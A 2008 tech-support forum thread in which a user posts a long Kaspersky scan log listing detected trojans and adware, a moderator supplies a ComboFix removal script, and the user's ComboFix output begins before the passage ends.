C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/bestcasinos.htm. Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/indextester.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_latest_encrypthome.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_coins_ontop.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_latest_with_bookmark.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_dec17_latest_with_homepage.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_feb2002_with_bookmark.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_latest_march21_with_rewards.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_latest_april3_before_newsimple.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN/bestodds.com/index_bookmark.html Infected: Trojan.JS.Seeker-based skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN Tar: infected - 15 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000B.VBN CryptZ: infected - 15 skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000C.VBN Infected: Trojan-Downloader.WMA.Wimad.d skipped
C:\Documents and Settings\All Users\Application Data\Symantec\Symantec AntiVirus Corporate Edition\7.5\Quarantine\0888000D.VBN Infected: Trojan-Downloader.WMA.Wimad.d skipped
C:\Documents and Settings\LocalService\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\LocalService\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\LocalService\ntuser.dat.LOG Object is locked skipped
C:\Documents and Settings\NetworkService\Cookies\index.dat Object is locked skipped
anthon69's Avatar
Junior Member with 9 posts.
  
Join Date: Apr 2008
07-Apr-2008, 09:31 PM #9
KASPERSKY LOG - PART 2
~~~~~~~~~~~~~~~~~~


C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\NetworkService\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\NetworkService\ntuser.dat.LOG Object is locked skipped
C:\Documents and Settings\tony\Application Data\acccore\nss\cert8.db Object is locked skipped
C:\Documents and Settings\tony\Application Data\acccore\nss\key3.db Object is locked skipped
C:\Documents and Settings\tony\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\cert8.db Object is locked skipped
C:\Documents and Settings\tony\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\history.dat Object is locked skipped
C:\Documents and Settings\tony\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\key3.db Object is locked skipped
C:\Documents and Settings\tony\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\parent.lock Object is locked skipped
C:\Documents and Settings\tony\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\search.sqlite Object is locked skipped
C:\Documents and Settings\tony\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\urlclassifier2.sqlite Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\call256.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\callmember256.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\chat512.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\chatmember256.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\chatmsg256.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\chatmsg512.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\contactgroup256.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\dyncontent\bundle.dat Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\index2.dat Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\profile256.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\user1024.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\user16384.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\Skype\pure-wealth\user256.dbb Object is locked skipped
C:\Documents and Settings\tony\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\AppLogs\SUPERANTISPYWARE-4-7-2008( 18-7-8 ).LOG Object is locked skipped
C:\Documents and Settings\tony\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\tony\Desktop\zodiac.exe/data0000.exe/WISE0017.BIN Infected: Trojan.Win32.DelFiles.s skipped
C:\Documents and Settings\tony\Desktop\zodiac.exe/data0000.exe Infected: Trojan.Win32.DelFiles.s skipped
C:\Documents and Settings\tony\Desktop\zodiac.exe Rsrc-Package: infected - 2 skipped
C:\Documents and Settings\tony\Local Settings\Application Data\AOL OCP\AIM\Storage\All Users\localStorage\common.cls Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\AOL OCP\AIM\Storage\data\lazybillionaire@hotmail.com\localStorage\common.cls Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\ApplicationHistory\cli.exe.c88dbd71.ini.inuse Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\ApplicationHistory\hpqimzone.exe.c627176f.ini.inuse Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\administrativeInfo.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\albumImagesTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\albumImagesTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\albumTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\albumTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\CB_Server_Errors.txt Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\EXIFTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\EXIFTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\imageTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\imageTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\imageTable.fpt Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\keywordImagesTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\keywordImagesTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\keywordTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\keywordTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\managedFolderTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\pathnameTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\pathnameTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\propertiesTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\propertiesTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\ROFImagesTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\ROFImagesTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\ROFTable.cdx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\HP\Digital Imaging\db\ROFTable.dbf Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Identities\{1A743673-1CFF-436D-879D-64F44B22B985}\Microsoft\Outlook Express\Folders.dbx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Identities\{1A743673-1CFF-436D-879D-64F44B22B985}\Microsoft\Outlook Express\Inbox.dbx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Identities\{1A743673-1CFF-436D-879D-64F44B22B985}\Microsoft\Outlook Express\Offline.dbx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Identities\{1A743673-1CFF-436D-879D-64F44B22B985}\Microsoft\Outlook Express\Pop3uidl.dbx Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\Cache\_CACHE_001_ Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\Cache\_CACHE_002_ Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\Cache\_CACHE_003_ Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Application Data\Mozilla\Firefox\Profiles\tj34eegb.default\Cache\_CACHE_MAP_ Object is locked skipped
C:\Documents and Settings\tony\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\tony\Local Settings\History\History.IE5\MSHist012008040720080408\index.dat Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Temp\hpodvd09.log Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Temp\Perflib_Perfdata_ab0.dat Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Temp\~DF77A7.tmp Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Temp\~DFCB14.tmp Object is locked skipped
C:\Documents and Settings\tony\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\tony\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\tony\NTUSER.DAT.LOG Object is locked skipped
C:\LasVegas-GamesBlackjack.exe/file7 Infected: not-a-virus:AdTool.Win32.WhenU.a skipped
C:\LasVegas-GamesBlackjack.exe Inno: infected - 1 skipped
C:\Program Files\Common Files\Real\Toolbar\RealBar.dll Infected: not-a-virus:AdWare.Win32.MegaSearch.s skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\chandir.dat Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\chandir.idx Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\chn.dat Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\chn.idx Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\D0000000.FCS Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\inuse.txt Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\L0000073.FCS Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\main.log Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs.dat Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs.idx Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs_die.dat Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs_die.idx Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs_dnd.dat Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs_dnd.idx Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs_ext.dat Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs_ext.idx Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs_rcv.dat Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\prs_rcv.idx Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\storydb.dat Object is locked skipped
C:\Program Files\Logitech\Desktop Messenger\8876480\Users\tony\Data\storydb.idx Object is locked skipped
C:\Program Files\mIRC\mirc.exe Infected: not-a-virus:Client-IRC.Win32.mIRC.631 skipped
C:\Program Files\Webroot\Enterprise\Spy Sweeper\Logs\ClientSessionLog.txt Object is locked skipped
C:\QooBox\Quarantine\C\Program Files\Bifrost\server.exe.vir Infected: Backdoor.Win32.Bifrose.plr skipped
C:\QooBox\Quarantine\C\WINDOWS\system32\bwidgfsb.dll.vir Infected: not-a-virus:AdWare.Win32.Virtumonde.lxl skipped
C:\QooBox\Quarantine\C\WINDOWS\system32\dbvhetud.dll.vir Infected: Packed.Win32.Monder.gen skipped
C:\QooBox\Quarantine\C\WINDOWS\system32\dnvjwxie.dll.vir Infected: not-a-virus:AdWare.Win32.Agent.bgj skipped
C:\QooBox\Quarantine\C\WINDOWS\system32\fjfbsrhy.dll.vir Infected: Packed.Win32.Monder.gen skipped
C:\QooBox\Quarantine\C\WINDOWS\system32\hrydnffd.dll.vir Infected: Packed.Win32.Monder.gen skipped
C:\QooBox\Quarantine\C\WINDOWS\system32\ioqqkrrh.dll.vir Infected: not-a-virus:AdWare.Win32.Virtumonde.mwq skipped
C:\QooBox\Quarantine\C\WINDOWS\system32\lfvahgrn.dll.vir Infected: not-a-virus:AdWare.Win32.Virtumonde.msm skipped
C:\QooBox\Quarantine\C\WINDOWS\system32\nfuxdpay.dll.vir Infected: Packed.Win32.Monder.gen skipped
C:\QooBox\Quarantine\C\WINDOWS\system32\xhsnjvki.dll.vir Infected: not-a-virus:AdWare.Win32.Virtumonde.mvn skipped
C:\QooBox\Quarantine\catchme2008-04-07_113618.64.zip/Documents and Settings/tony/Desktop/catchme.zip/ljJDSJab.dll Infected: not-a-virus:AdWare.Win32.Virtumonde.lwx skipped
C:\QooBox\Quarantine\catchme2008-04-07_113618.64.zip/Documents and Settings/tony/Desktop/catchme.zip/xxyyvSLb.dll Infected: not-a-virus:AdWare.Win32.Virtumonde.mef skipped
C:\QooBox\Quarantine\catchme2008-04-07_113618.64.zip/Documents and Settings/tony/Desktop/catchme.zip Infected: not-a-virus:AdWare.Win32.Virtumonde.mef skipped
C:\QooBox\Quarantine\catchme2008-04-07_113618.64.zip ZIP: infected - 3 skipped
C:\System Volume Information\MountPointManagerRemoteDatabase Object is locked skipped
C:\vnc-4_1_1-x86_win32.exe/file1 Infected: not-a-virus:RemoteAdmin.Win32.WinVNC.4110 skipped
C:\vnc-4_1_1-x86_win32.exe/file3 Infected: not-a-virus:RemoteAdmin.Win32.WinVNC.4 skipped
C:\vnc-4_1_1-x86_win32.exe Inno: infected - 2 skipped
C:\WINDOWS\Debug\PASSWD.LOG Object is locked skipped
C:\WINDOWS\SchedLgU.Txt Object is locked skipped
C:\WINDOWS\SoftwareDistribution\EventCache\{CCE7E228-FD01-4754-AF99-147A8BAC7050}.bin Object is locked skipped
C:\WINDOWS\SoftwareDistribution\ReportingEvents.log Object is locked skipped
C:\WINDOWS\Sti_Trace.log Object is locked skipped
C:\WINDOWS\system32\CatRoot2\edb.log Object is locked skipped
C:\WINDOWS\system32\CatRoot2\tmp.edb Object is locked skipped
C:\WINDOWS\system32\config\ACEEvent.evt Object is locked skipped
C:\WINDOWS\system32\config\AppEvent.Evt Object is locked skipped
C:\WINDOWS\system32\config\default Object is locked skipped
C:\WINDOWS\system32\config\default.LOG Object is locked skipped
C:\WINDOWS\system32\config\SAM Object is locked skipped
C:\WINDOWS\system32\config\SAM.LOG Object is locked skipped
C:\WINDOWS\system32\config\SecEvent.Evt Object is locked skipped
C:\WINDOWS\system32\config\SECURITY Object is locked skipped
C:\WINDOWS\system32\config\SECURITY.LOG Object is locked skipped
C:\WINDOWS\system32\config\software Object is locked skipped
C:\WINDOWS\system32\config\software.LOG Object is locked skipped
C:\WINDOWS\system32\config\SysEvent.Evt Object is locked skipped
C:\WINDOWS\system32\config\system Object is locked skipped
C:\WINDOWS\system32\config\system.LOG Object is locked skipped
C:\WINDOWS\system32\config\TS Log.evt Object is locked skipped
C:\WINDOWS\system32\h323log.txt Object is locked skipped
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.BTR Object is locked skipped
C:\WINDOWS\system32\wbem\Repository\FS\INDEX.MAP Object is locked skipped
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING.VER Object is locked skipped
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING1.MAP Object is locked skipped
C:\WINDOWS\system32\wbem\Repository\FS\MAPPING2.MAP Object is locked skipped
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.DATA Object is locked skipped
C:\WINDOWS\system32\wbem\Repository\FS\OBJECTS.MAP Object is locked skipped
C:\WINDOWS\Temp\CS066DA9B2-8236-40CB-B094-941140B72B01.tmp Object is locked skipped
C:\WINDOWS\Temp\CS08D787EA-C214-4554-86F6-ED37BCD4CAF8.tmp Object is locked skipped
C:\WINDOWS\Temp\CS114E3BFE-F7BD-40E6-B28D-6312AD116CFE.tmp Object is locked skipped
C:\WINDOWS\Temp\CS13FE8886-0147-4010-BD7F-03566176FAFE.tmp Object is locked skipped
C:\WINDOWS\Temp\CS176138C3-CECD-41F0-8990-5075218E8566.tmp Object is locked skipped
C:\WINDOWS\Temp\CS18065927-66BD-4261-A986-CEC681BC9E20.tmp Object is locked skipped
C:\WINDOWS\Temp\CS1F21B5FB-0ED3-4368-962B-217F556665E2.tmp Object is locked skipped
C:\WINDOWS\Temp\CS24529AE1-B2EC-40AE-9627-C258398301B1.tmp Object is locked skipped
C:\WINDOWS\Temp\CS3016FAA6-AB13-43A9-A530-7D2F192866E1.tmp Object is locked skipped
C:\WINDOWS\Temp\CS49C254C1-879B-43DB-B014-E1F492342565.tmp Object is locked skipped
C:\WINDOWS\Temp\CS4CCE6D5D-A923-459F-B2E2-13CDA4BA943B.tmp Object is locked skipped
C:\WINDOWS\Temp\CS517A02A0-038B-464E-855A-6DF61789C103.tmp Object is locked skipped
C:\WINDOWS\Temp\CS5E95F047-5BC2-49F1-8A03-F2FC6C302879.tmp Object is locked skipped
C:\WINDOWS\Temp\CS5F08759B-53FB-4CE6-9370-85EA2C292680.tmp Object is locked skipped
C:\WINDOWS\Temp\CS69E90BBD-6E8A-48A2-B254-53F4290CB6D8.tmp Object is locked skipped
C:\WINDOWS\Temp\CS786D6E34-9376-4DEB-B349-C5936B1E3306.tmp Object is locked skipped
C:\WINDOWS\Temp\CS7AB344FB-6871-4F06-8BC1-26E96ABD0FAE.tmp Object is locked skipped
C:\WINDOWS\Temp\CS7F8D7B68-D75C-417E-8D9A-422AFBDA485D.tmp Object is locked skipped
C:\WINDOWS\Temp\CS7FA41D1E-91D0-4A07-BBBC-E9848CC2148F.tmp Object is locked skipped
C:\WINDOWS\Temp\CS8CCF5C9D-14CD-418F-AAD3-F1F404CC63C9.tmp Object is locked skipped
C:\WINDOWS\Temp\CS9943420E-19D0-46A8-A113-E97EE4AF0819.tmp Object is locked skipped
C:\WINDOWS\Temp\CS9EE065C9-A191-4F38-BCD1-2C5025CF514E.tmp Object is locked skipped
C:\WINDOWS\Temp\CSA4340496-09F6-4CFC-9B9D-B1CD99C77A71.tmp Object is locked skipped
C:\WINDOWS\Temp\CSAB57E4AC-B912-416B-BD98-6E2C53AC7D22.tmp Object is locked skipped
C:\WINDOWS\Temp\CSBB43E48C-F847-4674-B0B1-F85D8377260A.tmp Object is locked skipped
C:\WINDOWS\Temp\CSC6869FA6-0F44-429D-8D64-62DD7B534948.tmp Object is locked skipped
C:\WINDOWS\Temp\CSD559E2E4-62FB-4C1C-B2CB-64C6EE35FB85.tmp Object is locked skipped
C:\WINDOWS\Temp\CSDA82E0AC-07B3-47E6-A0E0-EC55B0C6561E.tmp Object is locked skipped
C:\WINDOWS\Temp\CSDAA75471-E14A-49CC-A057-A727EC3F0D4F.tmp Object is locked skipped
C:\WINDOWS\Temp\CSEE2233A6-57A7-43E9-87FC-B342258A1A50.tmp Object is locked skipped
C:\WINDOWS\Temp\CSF27BB374-819B-4167-9715-2F635C58D4DF.tmp Object is locked skipped
C:\WINDOWS\Temp\CSF7331C3F-A0ED-411A-8323-95EA64AEC649.tmp Object is locked skipped
C:\WINDOWS\wiadebug.log Object is locked skipped
C:\WINDOWS\wiaservc.log Object is locked skipped
C:\WINDOWS\WindowsUpdate.log Object is locked skipped
D:\Business\tools\mirc631.exe/stream/data0001/stream/data0014 Infected: not-a-virus:Client-IRC.Win32.mIRC.631 skipped
D:\Business\tools\mirc631.exe/stream/data0001/stream Infected: not-a-virus:Client-IRC.Win32.mIRC.631 skipped
D:\Business\tools\mirc631.exe/stream/data0001 Infected: not-a-virus:Client-IRC.Win32.mIRC.631 skipped
D:\Business\tools\mirc631.exe/stream Infected: not-a-virus:Client-IRC.Win32.mIRC.631 skipped
D:\Business\tools\mirc631.exe NSIS: infected - 4 skipped
D:\Casinos\VegasVilla_w.exe/data0000.exe/WISE0017.BIN Infected: Trojan.Win32.DelFiles.s skipped
D:\Casinos\VegasVilla_w.exe/data0000.exe Infected: Trojan.Win32.DelFiles.s skipped
D:\Casinos\VegasVilla_w.exe Rsrc-Package: infected - 2 skipped
D:\mirc631.exe/stream/data0001/stream/data0014 Infected: not-a-virus:Client-IRC.Win32.mIRC.631 skipped
D:\mirc631.exe/stream/data0001/stream Infected: not-a-virus:Client-IRC.Win32.mIRC.631 skipped
D:\mirc631.exe/stream/data0001 Infected: not-a-virus:Client-IRC.Win32.mIRC.631 skipped
D:\mirc631.exe/stream Infected: not-a-virus:Client-IRC.Win32.mIRC.631 skipped
D:\mirc631.exe NSIS: infected - 4 skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2/packed/bestodds.com/index_latest_aug8.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2/packed/bestodds.com/index_latest_coins_aug10.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2/packed/bestodds.com/index_with_homepage.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2/packed/bestodds.com/index_ezulafix.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2/packed/bestodds.com/index_homepage.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2/packed/bestodds.com/bestcasinos.htm. Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2/packed/bestodds.com/indextester.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2/packed/bestodds.com/index_latest_encrypthome.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2/packed Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2 BZIP2: infected - 9 skipped
D:\Old Drive D\!backups\freechip\freechip.tar.bz2/packed/freechip.com/index_latest_aug8.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\freechip\freechip.tar.bz2/packed/freechip.com/index_latest_coinsaug10.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\freechip\freechip.tar.bz2/packed/freechip.com/index_with_homepage.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\freechip\freechip.tar.bz2/packed/freechip.com/index_ezulafix.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\freechip\freechip.tar.bz2/packed/freechip.com/index_homepage.html Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\freechip\freechip.tar.bz2/packed Infected: Trojan.JS.Seeker-based skipped
D:\Old Drive D\!backups\freechip\freechip.tar.bz2 BZIP2: infected - 6 skipped
D:\Old Drive D\Scripts\hotsex.exe Infected: not-a-virus:Porn-Dialer.Win32.Frelex skipped
D:\Old Drive F\!Site Files Backup\gambling.tar.bz2/gambling.com/dload/PompeysPalace.exe Infected: not-a-virusownloader.Win32.Casino skipped
D:\Old Drive F\!Site Files Backup\gambling.tar.bz2/gambling.com/dload/Pompey's Palacenew.exe Infected: not-a-virusownloader.Win32.Casino skipped
D:\Old Drive F\!Site Files Backup\gambling.tar.bz2/gambling.com/dload/PompeysPalaceCasino.exe Infected: not-a-virusownloader.Win32.Casino skipped
D:\Old Drive F\!Site Files Backup\gambling.tar.bz2 Tar: infected - 3 skipped
D:\System Volume Information\MountPointManagerRemoteDatabase Object is locked skipped
D:\x-psp-video-converter.doc Infected: not-a-virus:FraudTool.Win32.SpywareDetector.d skipped
E:\convert.exe Infected: not-a-virus:FraudTool.Win32.SpywareDetector.d skipped
E:\System Volume Information\MountPointManagerRemoteDatabase Object is locked skipped


Scan process completed.
cybertech's Avatar
Computer Specs
Moderator with 68,029 posts.
  
Join Date: Apr 2002
Location: Washington State
08-Apr-2008, 01:08 PM #10
Open Notepad and copy and paste the text in the quote box below into it:
Quote:
File::
C:\WINDOWS\system32\qhnhcfho.ini
C:\WINDOWS\system32\qfwvlxew.ini
C:\WINDOWS\system32\yntfdbjo.ini
C:\Documents and Settings\tony\Desktop\zodiac.exe
C:\LasVegas-GamesBlackjack.exe
D:\Casinos\VegasVilla_w.exe
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2
D:\Old Drive D\!backups\freechip\freechip.tar.bz2
D:\Old Drive D\Scripts\hotsex.exe
D:\Old Drive F\!Site Files Backup\gambling.tar.bz2
D:\x-psp-video-converter.doc
E:\convert.exe

Save the file to you desktop and name it CFScript.txt

Then drag the CFScript.txt into the ComboFix.exe as shown in the screenshot below.



This will start ComboFix again. It may ask to reboot.


Use Secunia software inspector & update checker to update your java and any other out of date applications.

Also go to add/remove programs and remove all old versions of Java.




Post the contents of Combofix.txt in your next reply together with a new HijackThis log.
__________________
Microsoft MVP/Windows - Consumer Security
anthon69's Avatar
Junior Member with 9 posts.
  
Join Date: Apr 2008
09-Apr-2008, 11:30 PM #11
COMBOFIX
~~~~~~~~~~~~~~~~~~~~~~~~~



ComboFix 08-04-06.1 - tony 2008-04-09 22:57:49.3 - NTFSx86
Microsoft Windows XP Professional 5.1.2600.2.1252.1.1033.18.418 [GMT -4:00]
Running from: C:\Documents and Settings\tony\Desktop\ComboFix.exe
Command switches used :: C:\Documents and Settings\tony\Desktop\CFScript.txt
* Created a new restore point

FILE ::
C:\Documents and Settings\tony\Desktop\zodiac.exe
C:\LasVegas-GamesBlackjack.exe
C:\WINDOWS\system32\qfwvlxew.ini
C:\WINDOWS\system32\qhnhcfho.ini
C:\WINDOWS\system32\yntfdbjo.ini
D:\Casinos\VegasVilla_w.exe
D:\Old Drive D\!backups\bestodds\bestodds.tar.bz2
D:\Old Drive D\!backups\freechip\freechip.tar.bz2
D:\Old Drive D\Scripts\hotsex.exe
D:\Old Drive F\!Site Files Backup\gambling.tar.bz2
D:\x-psp-video-converter.doc
E:\convert.exe
.

((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.

C:\Documents and Settings\tony\Desktop\zodiac.exe
C:\LasVegas-GamesBlackjack.exe
C:\WINDOWS\system32\qfwvlxew.ini
